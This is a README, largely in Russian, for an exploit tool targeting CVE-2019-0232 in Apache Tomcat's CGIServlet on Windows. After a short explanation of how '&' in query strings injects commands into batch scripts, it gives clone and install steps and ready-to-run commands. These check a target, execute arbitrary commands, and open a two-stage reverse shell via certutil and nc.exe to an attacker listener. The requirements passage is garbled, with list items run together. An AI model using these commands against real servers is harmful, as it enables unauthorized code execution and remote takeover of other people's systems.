
CVE-2019-0232 - Apache Tomcat CGIServlet enableCmdLineArguments RCE - PoC Exploit

Apache Tomcat CGIServlet enableCmdLineArguments RCE
Внедрение в Windows batch-скрипты через аргументы строки запроса
Apache Tomcat с включённым CGI-сервлетом и параметром enableCmdLineArguments=true передаёт аргументы строки запроса в качестве аргументов командной строки CGI-скриптам. В Windows batch-файлы (.bat/.cmd) интерпретируют символ & как разделитель команд, что позволяет выполнять произвольные команды через специально сформированный URL.
conf/web.xml или WEB-INF/web.xmlenableCmdLineArguments=true в init-params CGI-сервлетаism.bat)& необходимы batch-файлы)git clone https://github.com/yuzuki-ayanami/CVE-2019-0232
cd CVE-2019-0232
pip install -r requirements.txt
Проверка наличия CGI-точки входа:
python cve-2019-0232.py check -t http://target:8080
python cve-2019-0232.py check -t http://target:8080 --cgi /cgi-bin/printenv.bat
Выполнение команды:
python cve-2019-0232.py exec -t http://target:8080 -c whoami
python cve-2019-0232.py exec -t http://target:8080 -c 'ipconfig'
Обратная оболочка (2-этапная: certutil + nc.exe):
python cve-2019-0232.py revshell -t http://target:8080 --lhost 10.0.0.1 --lport 4444